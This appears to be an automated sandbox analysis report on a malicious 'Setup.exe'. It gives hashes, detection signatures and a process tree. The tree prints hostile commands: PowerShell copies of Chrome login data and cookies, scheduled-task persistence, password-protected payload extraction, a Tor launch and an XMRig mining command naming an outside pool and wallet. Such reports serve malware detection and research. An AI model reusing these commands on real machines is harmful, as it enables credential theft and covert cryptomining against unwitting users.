Analysis
-
max time kernel
147s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
09-04-2023 01:11
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win10v2004-20230220-en
General
-
Target
Setup.exe
-
Size
4.6MB
-
MD5
bb2b9511686430b87050de9f08c2ee00
-
SHA1
feb8169cdbe630f031e544f83a2fb91602cef66e
-
SHA256
e4d521e8c1f8bc496fe8fcdf2e083f0ab341696723586c83c12c5b13013843c3
-
SHA512
bcb9201aa95ecc98eca716b5857b1a239345d11e47574a2b3d18e36e7749cc6deab789d0925226b201093f1ba43d0b99c7cfc75511042577295e9151cf9960f5
-
SSDEEP
49152:dR9E4Y11/XROYJ82hfTfzM1tPgxjt4pb5jJYkaP5EL2WtGifV9FKc0i7h01W7x:KjzRHD3jdErG4V9h7x
Malware Config
Signatures
-
XMRig Miner payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/984-3201-0x0000000000150000-0x0000000000C61000-memory.dmp xmrig behavioral1/memory/984-3204-0x0000000000150000-0x0000000000C61000-memory.dmp xmrig behavioral1/memory/984-3206-0x0000000000150000-0x0000000000C61000-memory.dmp xmrig behavioral1/memory/984-3211-0x0000000000150000-0x0000000000C61000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
Processes:
oRJSTOW4qs.exeCL_Debug_Log.txtHelper.exeHelper.exeHelper.exeHelper.exetor.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exepid process 1972 oRJSTOW4qs.exe 1516 CL_Debug_Log.txt 392 Helper.exe 1860 Helper.exe 1692 Helper.exe 580 Helper.exe 1612 tor.exe 1728 Helper.exe 884 Helper.exe 980 Helper.exe 1492 Helper.exe 1960 Helper.exe -
Loads dropped DLL 13 IoCs
Processes:
oRJSTOW4qs.exetaskeng.exeHelper.exetor.exepid process 1972 oRJSTOW4qs.exe 1312 taskeng.exe 1312 taskeng.exe 1136 1692 Helper.exe 1692 Helper.exe 1612 tor.exe 1612 tor.exe 1612 tor.exe 1612 tor.exe 1612 tor.exe 1612 tor.exe 824 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
AutoIT Executable 13 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\oRJSTOW4qs.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\oRJSTOW4qs.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\64.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\32.exe autoit_exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe autoit_exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe autoit_exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe autoit_exe \Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe autoit_exe \Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe autoit_exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe autoit_exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe autoit_exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe autoit_exe \Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe autoit_exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Helper.exedescription pid process target process PID 1692 set thread context of 580 1692 Helper.exe Helper.exe PID 1692 set thread context of 1728 1692 Helper.exe Helper.exe PID 1692 set thread context of 984 1692 Helper.exe attrib.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 2 Go-http-client/1.1 -
NTFS ADS 1 IoCs
Processes:
Helper.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\BPOQNXYB\root\CIMV2 Helper.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeHelper.exepid process 748 powershell.exe 1336 powershell.exe 1732 powershell.exe 1820 powershell.exe 1612 powershell.exe 876 powershell.exe 328 powershell.exe 780 powershell.exe 956 powershell.exe 628 powershell.exe 1408 powershell.exe 688 powershell.exe 1876 powershell.exe 1876 powershell.exe 1876 powershell.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 460 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exewmic.exedescription pid process Token: SeIncreaseQuotaPrivilege 1808 WMIC.exe Token: SeSecurityPrivilege 1808 WMIC.exe Token: SeTakeOwnershipPrivilege 1808 WMIC.exe Token: SeLoadDriverPrivilege 1808 WMIC.exe Token: SeSystemProfilePrivilege 1808 WMIC.exe Token: SeSystemtimePrivilege 1808 WMIC.exe Token: SeProfSingleProcessPrivilege 1808 WMIC.exe Token: SeIncBasePriorityPrivilege 1808 WMIC.exe Token: SeCreatePagefilePrivilege 1808 WMIC.exe Token: SeBackupPrivilege 1808 WMIC.exe Token: SeRestorePrivilege 1808 WMIC.exe Token: SeShutdownPrivilege 1808 WMIC.exe Token: SeDebugPrivilege 1808 WMIC.exe Token: SeSystemEnvironmentPrivilege 1808 WMIC.exe Token: SeRemoteShutdownPrivilege 1808 WMIC.exe Token: SeUndockPrivilege 1808 WMIC.exe Token: SeManageVolumePrivilege 1808 WMIC.exe Token: 33 1808 WMIC.exe Token: 34 1808 WMIC.exe Token: 35 1808 WMIC.exe Token: SeIncreaseQuotaPrivilege 1808 WMIC.exe Token: SeSecurityPrivilege 1808 WMIC.exe Token: SeTakeOwnershipPrivilege 1808 WMIC.exe Token: SeLoadDriverPrivilege 1808 WMIC.exe Token: SeSystemProfilePrivilege 1808 WMIC.exe Token: SeSystemtimePrivilege 1808 WMIC.exe Token: SeProfSingleProcessPrivilege 1808 WMIC.exe Token: SeIncBasePriorityPrivilege 1808 WMIC.exe Token: SeCreatePagefilePrivilege 1808 WMIC.exe Token: SeBackupPrivilege 1808 WMIC.exe Token: SeRestorePrivilege 1808 WMIC.exe Token: SeShutdownPrivilege 1808 WMIC.exe Token: SeDebugPrivilege 1808 WMIC.exe Token: SeSystemEnvironmentPrivilege 1808 WMIC.exe Token: SeRemoteShutdownPrivilege 1808 WMIC.exe Token: SeUndockPrivilege 1808 WMIC.exe Token: SeManageVolumePrivilege 1808 WMIC.exe Token: 33 1808 WMIC.exe Token: 34 1808 WMIC.exe Token: 35 1808 WMIC.exe Token: SeIncreaseQuotaPrivilege 872 wmic.exe Token: SeSecurityPrivilege 872 wmic.exe Token: SeTakeOwnershipPrivilege 872 wmic.exe Token: SeLoadDriverPrivilege 872 wmic.exe Token: SeSystemProfilePrivilege 872 wmic.exe Token: SeSystemtimePrivilege 872 wmic.exe Token: SeProfSingleProcessPrivilege 872 wmic.exe Token: SeIncBasePriorityPrivilege 872 wmic.exe Token: SeCreatePagefilePrivilege 872 wmic.exe Token: SeBackupPrivilege 872 wmic.exe Token: SeRestorePrivilege 872 wmic.exe Token: SeShutdownPrivilege 872 wmic.exe Token: SeDebugPrivilege 872 wmic.exe Token: SeSystemEnvironmentPrivilege 872 wmic.exe Token: SeRemoteShutdownPrivilege 872 wmic.exe Token: SeUndockPrivilege 872 wmic.exe Token: SeManageVolumePrivilege 872 wmic.exe Token: 33 872 wmic.exe Token: 34 872 wmic.exe Token: 35 872 wmic.exe Token: SeIncreaseQuotaPrivilege 872 wmic.exe Token: SeSecurityPrivilege 872 wmic.exe Token: SeTakeOwnershipPrivilege 872 wmic.exe Token: SeLoadDriverPrivilege 872 wmic.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
Processes:
oRJSTOW4qs.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exeattrib.exepid process 1972 oRJSTOW4qs.exe 1972 oRJSTOW4qs.exe 1972 oRJSTOW4qs.exe 1972 oRJSTOW4qs.exe 392 Helper.exe 392 Helper.exe 392 Helper.exe 1860 Helper.exe 1860 Helper.exe 1860 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 884 Helper.exe 884 Helper.exe 884 Helper.exe 980 Helper.exe 980 Helper.exe 980 Helper.exe 1492 Helper.exe 1492 Helper.exe 1492 Helper.exe 1960 Helper.exe 1960 Helper.exe 1960 Helper.exe 984 attrib.exe -
Suspicious use of SendNotifyMessage 25 IoCs
Processes:
oRJSTOW4qs.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exepid process 1972 oRJSTOW4qs.exe 1972 oRJSTOW4qs.exe 1972 oRJSTOW4qs.exe 1972 oRJSTOW4qs.exe 392 Helper.exe 392 Helper.exe 392 Helper.exe 1860 Helper.exe 1860 Helper.exe 1860 Helper.exe 1692 Helper.exe 1692 Helper.exe 1692 Helper.exe 884 Helper.exe 884 Helper.exe 884 Helper.exe 980 Helper.exe 980 Helper.exe 980 Helper.exe 1492 Helper.exe 1492 Helper.exe 1492 Helper.exe 1960 Helper.exe 1960 Helper.exe 1960 Helper.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1200 wrote to memory of 764 1200 Setup.exe cmd.exe PID 1200 wrote to memory of 764 1200 Setup.exe cmd.exe PID 1200 wrote to memory of 764 1200 Setup.exe cmd.exe PID 764 wrote to memory of 1808 764 cmd.exe WMIC.exe PID 764 wrote to memory of 1808 764 cmd.exe WMIC.exe PID 764 wrote to memory of 1808 764 cmd.exe WMIC.exe PID 1200 wrote to memory of 872 1200 Setup.exe wmic.exe PID 1200 wrote to memory of 872 1200 Setup.exe wmic.exe PID 1200 wrote to memory of 872 1200 Setup.exe wmic.exe PID 1200 wrote to memory of 992 1200 Setup.exe cmd.exe PID 1200 wrote to memory of 992 1200 Setup.exe cmd.exe PID 1200 wrote to memory of 992 1200 Setup.exe cmd.exe PID 992 wrote to memory of 1020 992 cmd.exe WMIC.exe PID 992 wrote to memory of 1020 992 cmd.exe WMIC.exe PID 992 wrote to memory of 1020 992 cmd.exe WMIC.exe PID 1200 wrote to memory of 564 1200 Setup.exe cmd.exe PID 1200 wrote to memory of 564 1200 Setup.exe cmd.exe PID 1200 wrote to memory of 564 1200 Setup.exe cmd.exe PID 564 wrote to memory of 956 564 cmd.exe WMIC.exe PID 564 wrote to memory of 956 564 cmd.exe WMIC.exe PID 564 wrote to memory of 956 564 cmd.exe WMIC.exe PID 1200 wrote to memory of 1872 1200 Setup.exe cmd.exe PID 1200 wrote to memory of 1872 1200 Setup.exe cmd.exe PID 1200 wrote to memory of 1872 1200 Setup.exe cmd.exe PID 1872 wrote to memory of 1960 1872 cmd.exe systeminfo.exe PID 1872 wrote to memory of 1960 1872 cmd.exe systeminfo.exe PID 1872 wrote to memory of 1960 1872 cmd.exe systeminfo.exe PID 1200 wrote to memory of 748 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 748 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 748 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1336 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1336 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1336 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1732 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1732 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1732 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1820 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1820 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1820 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1612 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1612 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1612 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 876 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 876 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 876 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 328 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 328 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 328 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 780 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 780 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 780 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 956 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 956 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 956 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 628 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 628 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 628 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1408 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1408 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1408 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 688 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 688 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 688 1200 Setup.exe powershell.exe PID 1200 wrote to memory of 1876 1200 Setup.exe powershell.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c "wmic csproduct get uuid"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C "wmic path win32_VideoController get name"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
-
C:\Windows\system32\cmd.execmd /C "wmic cpu get name"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name3⤵
-
C:\Windows\system32\cmd.execmd "/c " systeminfo2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\XVlBzgbaiC\""2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History\" \"C:\Users\Admin\AppData\Local\Temp\MRAjWwhTHc\""2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\tcuAxhxKQFDaFpL\""2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\SjFbcXoEFf\""2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\RsWxPLDnJObCsNV\""2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\lgTeMaPEZQ\""2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\leQYhYzRyWJjPjz\""2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\pfRFEgmota\""2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\FetHsbZRjxAwnwe\""2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\krBEmfdzdc\""2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\EkXBAkjQZLCtTMt\""2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Microsoft\Windows\History\" \"C:\Users\Admin\AppData\Local\Temp\TCoaNatyyi\""2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "start-process C:\Users\Admin\AppData\Local\Temp\oRJSTOW4qs.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\oRJSTOW4qs.exe"C:\Users\Admin\AppData\Local\Temp\oRJSTOW4qs.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txtC:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {105ACEE4-9E81-48B9-B05F-0AD7B974BD2E} S-1-5-21-2647223082-2067913677-935928954-1000:BPOQNXYB\Admin:Interactive:[1]1⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck257563⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"4⤵
- Executes dropped EXE
-
C:\Windows\System32\attrib.exe-a rx/0 -o stratum+tcp://pool.supportxmr.com:3333 -u 48cnr1UZQvZCr4q2Z2DqkFf743hSkpw4EMa8G6PRkgbTgjtKde25oGwLW2KD86ZSGw1yCQQD9uYYRaNeyNJBZ6FvDhk8DUT -p x -t 44⤵
- Suspicious use of FindShellTrayWindow
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck257563⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck257563⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\32.exeFilesize
7.4MB
MD5a8808bfc770ae3f4003b7ea51f76850e
SHA19da878867268430ae90e53f49b0c40f573e93cb9
SHA2560d90393bca4569185f39bb13dbdffff789c89557b6bf82b3ba8b77a78811b780
SHA512bd3e4263316464e3820f1a5fae5552489978ab4f0c012c572c32e8ac9ceb7c329296110bf011a6ad55e1cfd0d411bef30e297be8a79bc8eabda670c940cde92e
-
C:\Users\Admin\AppData\Local\Temp\64.exeFilesize
8.4MB
MD5326f58639db587d699c27ea4a7efdb1e
SHA10629076875bb08c9e9309710905d6cd4ea623ec2
SHA256063d3e7945c505f7f3d21207301d4a1e78af5518cf2077e0a7f47fb78737b7b4
SHA512ee0ee76768213f0232f4255a281ddc635aee9d5ffda084c35831068cf92e4708a7db3a338db72fe9e3c4c74978469aefeb8d977daa049746abacd135b254ee4b
-
C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txtFilesize
722KB
MD543141e85e7c36e31b52b22ab94d5e574
SHA1cfd7079a9b268d84b856dc668edbb9ab9ef35312
SHA256ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d
SHA5129119ae7500aa5cccf26a0f18fd8454245347e3c01dabba56a93dbaaab86535e62b1357170758f3b3445b8359e7dd5d37737318a5d8a6047c499d32d5b64126fc
-
C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txtFilesize
14.6MB
MD5b8840f4e7c9616df40fa3129bb482e53
SHA17e5674af867625a5ce4af4dcdd111b60d5ec5ba5
SHA256443dbb98ddde064f0aeb0172da63a0ccb789df7406b986e81cd4340b4300cc6b
SHA5124145ac521fe4de193e9af7b661330c2fda6a7594b3ba6da51677bca1a428b3b403524126a0cb6a8ade48b559902c23a09d456778560eb412d8c07756cb9d9708
-
C:\Users\Admin\AppData\Local\Temp\EkXBAkjQZLCtTMtFilesize
71KB
MD52beb695add0546f6a18496aae58b2558
SHA11fd818202a94825c56ad7a7793bea87c6f02960e
SHA256132cb7037ada7d8563c5b8cf64796ed22b0fbc1ccefbbbf5faa3c18545b289ed
SHA512e80fa42ab27afa16e0f6f72639077be7da3e73f7c7b4cecbe0d24637ee76334de77a2b61e7c3afab4e3750e53a93baa68d3cdb9c1eb55fb9a5d580cff94f21f2
-
C:\Users\Admin\AppData\Local\Temp\FetHsbZRjxAwnweFilesize
71KB
MD52beb695add0546f6a18496aae58b2558
SHA11fd818202a94825c56ad7a7793bea87c6f02960e
SHA256132cb7037ada7d8563c5b8cf64796ed22b0fbc1ccefbbbf5faa3c18545b289ed
SHA512e80fa42ab27afa16e0f6f72639077be7da3e73f7c7b4cecbe0d24637ee76334de77a2b61e7c3afab4e3750e53a93baa68d3cdb9c1eb55fb9a5d580cff94f21f2
-
C:\Users\Admin\AppData\Local\Temp\MRAjWwhTHcFilesize
148KB
MD590a1d4b55edf36fa8b4cc6974ed7d4c4
SHA1aba1b8d0e05421e7df5982899f626211c3c4b5c1
SHA2567cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c
SHA512ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2
-
C:\Users\Admin\AppData\Local\Temp\RsWxPLDnJObCsNVFilesize
71KB
MD52beb695add0546f6a18496aae58b2558
SHA11fd818202a94825c56ad7a7793bea87c6f02960e
SHA256132cb7037ada7d8563c5b8cf64796ed22b0fbc1ccefbbbf5faa3c18545b289ed
SHA512e80fa42ab27afa16e0f6f72639077be7da3e73f7c7b4cecbe0d24637ee76334de77a2b61e7c3afab4e3750e53a93baa68d3cdb9c1eb55fb9a5d580cff94f21f2
-
C:\Users\Admin\AppData\Local\Temp\SjFbcXoEFfFilesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
C:\Users\Admin\AppData\Local\Temp\SystemCheck.xmlFilesize
2KB
MD59160347bec74471e1a79edfd950629ae
SHA1c149a7e5aab6e349a70b7b458d0eaaa9d301c790
SHA2560fe356f3d04bb43f772604b049fd2b20f3038ca2ce84bf9778b8ccdd481d77ab
SHA512b8061834f658567a1e742496c38688bdecd60191a92163d47470f64aa1fba23e92dd36fa1d2bb7efa36f14002c0606013973718b9f107e62d845a17be4b0d358
-
C:\Users\Admin\AppData\Local\Temp\asacpiex.dllFilesize
14.6MB
MD5100c2d6dbc4bb7adcd3070bc2df4ac03
SHA1d4c4efe177b1f19c9ff1c996c650be6d3d31238a
SHA2562b1f12836fc30464fc78ce061283f242810ee49be34dff99e49c52b09411d3b0
SHA5121037a8d3abd7d256c291000efa0f26ec67ecfce30546f94fdf7804aedb35b1289b5bebc0bdafd9bf4f37b173a85d9f7ac8077134200eb13fa4654021b8a7200d
-
C:\Users\Admin\AppData\Local\Temp\krBEmfdzdcFilesize
71KB
MD52beb695add0546f6a18496aae58b2558
SHA11fd818202a94825c56ad7a7793bea87c6f02960e
SHA256132cb7037ada7d8563c5b8cf64796ed22b0fbc1ccefbbbf5faa3c18545b289ed
SHA512e80fa42ab27afa16e0f6f72639077be7da3e73f7c7b4cecbe0d24637ee76334de77a2b61e7c3afab4e3750e53a93baa68d3cdb9c1eb55fb9a5d580cff94f21f2
-
C:\Users\Admin\AppData\Local\Temp\krBEmfdzdcFilesize
71KB
MD52beb695add0546f6a18496aae58b2558
SHA11fd818202a94825c56ad7a7793bea87c6f02960e
